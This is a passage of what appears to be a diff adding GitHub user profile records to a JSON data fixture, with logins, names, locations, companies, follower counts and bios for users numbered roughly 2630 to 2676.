@Akkodis ", + "is_hireable": false, + "twitter_username": "elliotsegler" + } +}, +{ + "model": "github.user", + "pk": 2630, + "fields": { + "nest_created_at": "2024-09-12T01:36:48.276Z", + "nest_updated_at": "2024-09-16T22:28:57.114Z", + "name": "", + "login": "securityguru", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7437404?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2014-04-29T08:22:51Z", + "updated_at": "2022-11-01T14:27:36Z", + "node_id": "MDQ6VXNlcjc0Mzc0MDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2631, + "fields": { + "nest_created_at": "2024-09-12T01:36:52.404Z", + "nest_updated_at": "2024-09-12T01:36:52.404Z", + "name": "Marjan Bugarinovic", + "login": "alternaivan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25727477?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2017-02-12T19:22:32Z", + "updated_at": "2024-07-24T06:42:32Z", + "node_id": "MDQ6VXNlcjI1NzI3NDc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2632, + "fields": { + "nest_created_at": "2024-09-12T01:36:56.723Z", + "nest_updated_at": "2024-09-12T01:36:56.723Z", + "name": "herbert", + "login": "gruselglatz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15243394?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2015-10-22T06:17:55Z", + "updated_at": "2024-03-11T18:31:57Z", + "node_id": "MDQ6VXNlcjE1MjQzMzk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2633, + "fields": { + "nest_created_at": "2024-09-12T01:36:58.804Z", + "nest_updated_at": "2024-09-12T01:36:58.804Z", + "name": "Aksel Allas", + "login": "AkselAllas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26136082?v=4", + "company": "", + "location": "Estonia", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2017-03-02T08:56:47Z", + "updated_at": "2024-06-25T07:29:51Z", + "node_id": "MDQ6VXNlcjI2MTM2MDgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2634, + "fields": { + "nest_created_at": "2024-09-12T01:37:00.921Z", + "nest_updated_at": "2024-09-12T01:37:00.921Z", + "name": "", + "login": "straimtheone", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20614638?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-07-23T15:51:57Z", + "updated_at": "2024-09-10T13:52:44Z", + "node_id": "MDQ6VXNlcjIwNjE0NjM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2635, + "fields": { + "nest_created_at": "2024-09-12T01:37:04.261Z", + "nest_updated_at": "2024-09-12T01:39:43.096Z", + "name": "Ronald", + "login": "black-snow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/579733?v=4", + "company": "", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 19, + "public_gists_count": 6, + "public_repositories_count": 18, + "created_at": "2011-01-23T21:38:57Z", + "updated_at": "2024-05-28T20:09:05Z", + "node_id": "MDQ6VXNlcjU3OTczMw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2636, + "fields": { + "nest_created_at": "2024-09-12T01:37:05.731Z", + "nest_updated_at": "2024-09-12T01:37:05.731Z", + "name": "", + "login": "Aster-Lin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/152589565?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-12-01T06:29:56Z", + "updated_at": "2024-06-13T01:30:41Z", + "node_id": "U_kgDOCRhU_Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2637, + "fields": { + "nest_created_at": "2024-09-12T01:37:15.518Z", + "nest_updated_at": "2024-09-12T01:39:53.963Z", + "name": "Attila Kocsis", + "login": "tsimas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1420075?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2012-02-08T15:58:16Z", + "updated_at": "2024-08-30T06:57:11Z", + "node_id": "MDQ6VXNlcjE0MjAwNzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2638, + "fields": { + "nest_created_at": "2024-09-12T01:37:23.433Z", + "nest_updated_at": "2024-09-12T01:37:23.433Z", + "name": "Brent England", + "login": "brentos99", + "email": "brentos@freshfighter.net", + "avatar_url": "https://avatars.githubusercontent.com/u/12946723?v=4", + "company": "", + "location": "Queensland, Australia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2015-06-18T04:48:10Z", + "updated_at": "2024-08-18T03:27:40Z", + "node_id": "MDQ6VXNlcjEyOTQ2NzIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2639, + "fields": { + "nest_created_at": "2024-09-12T01:37:24.731Z", + "nest_updated_at": "2024-09-12T01:37:24.731Z", + "name": "", + "login": "ArtWachowski", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47650079?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2019-02-15T01:49:39Z", + "updated_at": "2024-09-06T09:33:38Z", + "node_id": "MDQ6VXNlcjQ3NjUwMDc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2640, + "fields": { + "nest_created_at": "2024-09-12T01:37:26.819Z", + "nest_updated_at": "2024-09-12T01:37:26.819Z", + "name": "", + "login": "mariotepro", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15969360?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2015-11-22T17:44:34Z", + "updated_at": "2024-08-12T22:20:39Z", + "node_id": "MDQ6VXNlcjE1OTY5MzYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2641, + "fields": { + "nest_created_at": "2024-09-12T01:37:29.782Z", + "nest_updated_at": "2024-09-12T01:37:29.782Z", + "name": "Estelle", + "login": "stl543", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23101824?v=4", + "company": "", + "location": "France", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-10-27T14:36:20Z", + "updated_at": "2024-07-08T07:45:54Z", + "node_id": "MDQ6VXNlcjIzMTAxODI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2642, + "fields": { + "nest_created_at": "2024-09-12T01:37:31.514Z", + "nest_updated_at": "2024-09-12T01:37:31.514Z", + "name": "", + "login": "bobro99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/160594711?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-02-20T10:02:14Z", + "updated_at": "2024-08-17T12:38:22Z", + "node_id": "U_kgDOCZJ7Fw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2643, + "fields": { + "nest_created_at": "2024-09-12T01:37:33.223Z", + "nest_updated_at": "2024-09-12T01:37:33.223Z", + "name": "Patrick Wang", + "login": "Firefox2100", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39050699?v=4", + "company": "", + "location": "Leicester, UK", + "collaborators_count": 0, + "following_count": 34, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 44, + "created_at": "2018-05-07T09:41:36Z", + "updated_at": "2024-08-22T19:07:16Z", + "node_id": "MDQ6VXNlcjM5MDUwNjk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2644, + "fields": { + "nest_created_at": "2024-09-12T01:37:34.902Z", + "nest_updated_at": "2024-09-12T01:37:34.902Z", + "name": "Quentin Gosset", + "login": "quentingosset", + "email": "quentingosset7500@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6824137?v=4", + "company": "Infrabel", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 35, + "public_gists_count": 7, + "public_repositories_count": 35, + "created_at": "2014-03-01T11:58:47Z", + "updated_at": "2024-09-06T07:41:07Z", + "node_id": "MDQ6VXNlcjY4MjQxMzc=", + "bio": "Software developer, Hacker, Blockchain lover, ... \r\nNew technologies are my passion.", + "is_hireable": false, + "twitter_username": "quentingosset" + } +}, +{ + "model": "github.user", + "pk": 2645, + "fields": { + "nest_created_at": "2024-09-12T01:37:38.281Z", + "nest_updated_at": "2024-09-12T01:37:38.281Z", + "name": "Mikael Carneholm", + "login": "mikael-carneholm-2-wcar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60105757?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-01-20T15:27:30Z", + "updated_at": "2024-03-13T09:23:23Z", + "node_id": "MDQ6VXNlcjYwMTA1NzU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2646, + "fields": { + "nest_created_at": "2024-09-12T01:37:40.766Z", + "nest_updated_at": "2024-09-12T01:37:40.766Z", + "name": "Robert Blackman", + "login": "robert-blackman", + "email": "robert.blackman@monster.com", + "avatar_url": "https://avatars.githubusercontent.com/u/57333677?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2019-11-04T00:00:08Z", + "updated_at": "2024-01-07T22:42:03Z", + "node_id": "MDQ6VXNlcjU3MzMzNjc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2647, + "fields": { + "nest_created_at": "2024-09-12T01:37:45.497Z", + "nest_updated_at": "2024-09-12T01:37:45.497Z", + "name": "", + "login": "rozeru1125", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/147065307?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-10-05T12:56:48Z", + "updated_at": "2024-03-20T17:52:22Z", + "node_id": "U_kgDOCMQJ2w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2648, + "fields": { + "nest_created_at": "2024-09-12T01:37:48.369Z", + "nest_updated_at": "2024-09-12T01:37:48.369Z", + "name": "Jonathan Mezach", + "login": "jmezach", + "email": "jonathan.mezach@rr-wfm.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1225489?v=4", + "company": "@rr-wfm", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 43, + "public_gists_count": 5, + "public_repositories_count": 68, + "created_at": "2011-11-28T14:34:21Z", + "updated_at": "2024-09-07T07:03:50Z", + "node_id": "MDQ6VXNlcjEyMjU0ODk=", + "bio": "Solution Architect at R&R WFM in Veenendaal, The Netherlands. Passionate about .NET and helping development teams achieve more by improving their experience.", + "is_hireable": false, + "twitter_username": "jmezach" + } +}, +{ + "model": "github.user", + "pk": 2649, + "fields": { + "nest_created_at": "2024-09-12T01:37:50.014Z", + "nest_updated_at": "2024-09-12T01:37:50.015Z", + "name": "João Mauricio", + "login": "jmoalves", + "email": "jmoalves.dev@pobox.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15057966?v=4", + "company": "", + "location": "Brazil", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2015-10-10T00:29:30Z", + "updated_at": "2024-08-22T00:33:04Z", + "node_id": "MDQ6VXNlcjE1MDU3OTY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2650, + "fields": { + "nest_created_at": "2024-09-12T01:37:51.294Z", + "nest_updated_at": "2024-09-22T19:40:57.102Z", + "name": "", + "login": "SaberStrat", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11158273?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2015-02-23T11:09:36Z", + "updated_at": "2024-09-01T16:19:20Z", + "node_id": "MDQ6VXNlcjExMTU4Mjcz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2651, + "fields": { + "nest_created_at": "2024-09-12T01:37:52.529Z", + "nest_updated_at": "2024-09-16T22:28:58.155Z", + "name": "", + "login": "Tobsensgit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47250264?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-02-01T14:53:21Z", + "updated_at": "2024-04-03T13:39:49Z", + "node_id": "MDQ6VXNlcjQ3MjUwMjY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2652, + "fields": { + "nest_created_at": "2024-09-12T01:37:54.201Z", + "nest_updated_at": "2024-09-12T01:37:54.201Z", + "name": "", + "login": "WantDead", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77077842?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-01-06T21:04:39Z", + "updated_at": "2024-09-03T22:16:15Z", + "node_id": "MDQ6VXNlcjc3MDc3ODQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2653, + "fields": { + "nest_created_at": "2024-09-12T01:37:57.945Z", + "nest_updated_at": "2024-09-12T01:37:57.945Z", + "name": "Brett Delle Grazie", + "login": "bdellegrazie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/973480?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 94, + "created_at": "2011-08-11T09:17:24Z", + "updated_at": "2024-09-04T11:20:21Z", + "node_id": "MDQ6VXNlcjk3MzQ4MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2654, + "fields": { + "nest_created_at": "2024-09-12T01:38:04.318Z", + "nest_updated_at": "2024-09-12T01:38:04.318Z", + "name": "Massimo Prencipe", + "login": "masse-solita", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54018836?v=4", + "company": "Solita", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-08-12T07:08:31Z", + "updated_at": "2024-07-22T05:47:24Z", + "node_id": "MDQ6VXNlcjU0MDE4ODM2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2655, + "fields": { + "nest_created_at": "2024-09-12T01:38:06.860Z", + "nest_updated_at": "2024-09-12T01:38:06.860Z", + "name": "Margus Anvelt", + "login": "margusanvelt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15866756?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2015-11-16T07:22:51Z", + "updated_at": "2024-04-18T13:27:05Z", + "node_id": "MDQ6VXNlcjE1ODY2NzU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2656, + "fields": { + "nest_created_at": "2024-09-12T01:38:10.633Z", + "nest_updated_at": "2024-09-12T01:38:10.633Z", + "name": "Jason Reed", + "login": "jreed-cartago", + "email": "j.reed@cartago.com", + "avatar_url": "https://avatars.githubusercontent.com/u/72963764?v=4", + "company": "Cartago Software GmbH", + "location": "Landshut Germany", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-10-16T06:26:39Z", + "updated_at": "2024-06-20T08:44:00Z", + "node_id": "MDQ6VXNlcjcyOTYzNzY0", + "bio": "Java Software Developer at Cartago-Software in Landshut Germany,", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2657, + "fields": { + "nest_created_at": "2024-09-12T01:38:11.911Z", + "nest_updated_at": "2024-09-12T01:38:11.911Z", + "name": "Akshay kumar", + "login": "akshayd3v", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118272033?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-11-15T11:46:10Z", + "updated_at": "2024-09-10T05:39:25Z", + "node_id": "U_kgDOBwywIQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2658, + "fields": { + "nest_created_at": "2024-09-12T01:38:17.356Z", + "nest_updated_at": "2024-09-12T01:38:17.356Z", + "name": "", + "login": "fengliu012", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/134475245?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-05-24T05:30:21Z", + "updated_at": "2023-05-24T05:30:21Z", + "node_id": "U_kgDOCAPt7Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2659, + "fields": { + "nest_created_at": "2024-09-12T01:38:20.323Z", + "nest_updated_at": "2024-09-12T01:38:20.323Z", + "name": "", + "login": "starfishfive", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/161029169?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-02-23T11:26:43Z", + "updated_at": "2024-02-23T11:26:43Z", + "node_id": "U_kgDOCZkcMQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2660, + "fields": { + "nest_created_at": "2024-09-12T01:38:21.561Z", + "nest_updated_at": "2024-09-12T01:38:21.561Z", + "name": "", + "login": "markehack", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7780449?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-06-03T12:16:54Z", + "updated_at": "2024-02-27T15:25:07Z", + "node_id": "MDQ6VXNlcjc3ODA0NDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2661, + "fields": { + "nest_created_at": "2024-09-12T01:38:24.105Z", + "nest_updated_at": "2024-09-16T22:29:01.629Z", + "name": "Shakti Singh Rathore", + "login": "ccfahe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43042984?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2018-09-06T16:26:52Z", + "updated_at": "2024-04-20T16:53:49Z", + "node_id": "MDQ6VXNlcjQzMDQyOTg0", + "bio": "Devops and SRE ,having 7 years of experience in building CICD and implementation devops practices in organisations", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2662, + "fields": { + "nest_created_at": "2024-09-12T01:38:25.760Z", + "nest_updated_at": "2024-09-12T01:38:25.760Z", + "name": "", + "login": "sbklahr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/119951143?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-12-06T14:29:19Z", + "updated_at": "2024-05-21T09:05:46Z", + "node_id": "U_kgDOByZPJw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2663, + "fields": { + "nest_created_at": "2024-09-12T01:38:31.203Z", + "nest_updated_at": "2024-09-16T22:29:07.191Z", + "name": "", + "login": "mzweem", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/165893083?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-04-03T09:05:03Z", + "updated_at": "2024-09-11T14:24:34Z", + "node_id": "U_kgDOCeNT2w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2664, + "fields": { + "nest_created_at": "2024-09-12T01:38:32.453Z", + "nest_updated_at": "2024-09-12T01:40:40.411Z", + "name": "", + "login": "tapmch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/132920574?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-05-08T14:27:08Z", + "updated_at": "2024-09-09T06:26:19Z", + "node_id": "U_kgDOB-w0_g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2665, + "fields": { + "nest_created_at": "2024-09-12T01:38:35.762Z", + "nest_updated_at": "2024-09-22T19:40:09.565Z", + "name": "Swapnil Pawar", + "login": "spawar-apex", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/127979991?v=4", + "company": "Apex Fintech Solutions", + "location": "Chicago", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2023-03-15T17:09:18Z", + "updated_at": "2024-01-10T19:07:53Z", + "node_id": "U_kgDOB6DR1w", + "bio": "Cloud Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2666, + "fields": { + "nest_created_at": "2024-09-12T01:38:44.010Z", + "nest_updated_at": "2024-09-22T19:42:23.680Z", + "name": "Aravind Parappil", + "login": "aravindparappil46", + "email": "aravindparappil@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/43161107?v=4", + "company": "", + "location": "Austin, TX", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 40, + "created_at": "2018-09-11T03:31:43Z", + "updated_at": "2024-09-17T20:47:11Z", + "node_id": "MDQ6VXNlcjQzMTYxMTA3", + "bio": "Software Engineer. Cloud & AppSec Enthusiast", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2667, + "fields": { + "nest_created_at": "2024-09-12T01:38:44.849Z", + "nest_updated_at": "2024-09-12T01:38:44.849Z", + "name": "", + "login": "sunilnaidugc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107829313?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2022-06-20T04:48:14Z", + "updated_at": "2024-06-06T08:29:16Z", + "node_id": "U_kgDOBm1YQQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2668, + "fields": { + "nest_created_at": "2024-09-12T01:38:46.501Z", + "nest_updated_at": "2024-09-12T01:38:46.501Z", + "name": "Shubham Bhingarde", + "login": "Shubham-Bhingarde", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92458532?v=4", + "company": "CDAC Mumbai", + "location": "juhu", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-10-13T16:10:59Z", + "updated_at": "2023-09-21T11:45:43Z", + "node_id": "U_kgDOBYLOJA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2669, + "fields": { + "nest_created_at": "2024-09-12T01:38:47.750Z", + "nest_updated_at": "2024-09-12T01:39:12.612Z", + "name": "", + "login": "andreeaButerchi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16935118?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-01-28T09:29:23Z", + "updated_at": "2024-08-29T07:56:30Z", + "node_id": "MDQ6VXNlcjE2OTM1MTE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2670, + "fields": { + "nest_created_at": "2024-09-12T01:38:49.200Z", + "nest_updated_at": "2024-09-16T22:29:02.655Z", + "name": "", + "login": "mikehall-mozz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/172062109?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-06-07T16:04:05Z", + "updated_at": "2024-06-07T16:04:18Z", + "node_id": "U_kgDOCkF1nQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2671, + "fields": { + "nest_created_at": "2024-09-12T01:38:56.263Z", + "nest_updated_at": "2024-09-12T01:39:05.011Z", + "name": "zim", + "login": "x-zim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68728715?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2020-07-24T07:24:48Z", + "updated_at": "2024-07-26T06:59:21Z", + "node_id": "MDQ6VXNlcjY4NzI4NzE1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2672, + "fields": { + "nest_created_at": "2024-09-12T01:38:58.717Z", + "nest_updated_at": "2024-09-12T01:38:58.717Z", + "name": "", + "login": "nandu525", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32590543?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-10-07T08:29:21Z", + "updated_at": "2024-06-18T08:20:34Z", + "node_id": "MDQ6VXNlcjMyNTkwNTQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2673, + "fields": { + "nest_created_at": "2024-09-12T01:39:01.614Z", + "nest_updated_at": "2024-09-12T01:39:46.850Z", + "name": "Eugen Hoffmann", + "login": "eugenhoffmann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/142139018?v=4", + "company": "Rohde & Schwarz GmbH & Co. KG", + "location": "Munich", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-13T06:34:45Z", + "updated_at": "2024-09-02T08:25:45Z", + "node_id": "U_kgDOCHjeig", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2674, + "fields": { + "nest_created_at": "2024-09-12T01:39:03.739Z", + "nest_updated_at": "2024-09-12T01:39:03.739Z", + "name": "Caleb Szalacinski", + "login": "Szalacinski", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1143359?v=4", + "company": "", + "location": "Nashville, Tennessee", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2011-10-21T14:52:15Z", + "updated_at": "2024-06-21T22:22:12Z", + "node_id": "MDQ6VXNlcjExNDMzNTk=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2675, + "fields": { + "nest_created_at": "2024-09-12T01:39:06.673Z", + "nest_updated_at": "2024-09-12T01:39:06.673Z", + "name": "", + "login": "cheonsaxelle", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118678392?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-11-20T15:42:08Z", + "updated_at": "2023-11-13T12:26:16Z", + "node_id": "U_kgDOBxLjeA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2676, + "fields": { + "nest_created_at": "2024-09-12T01:39:08.824Z", + 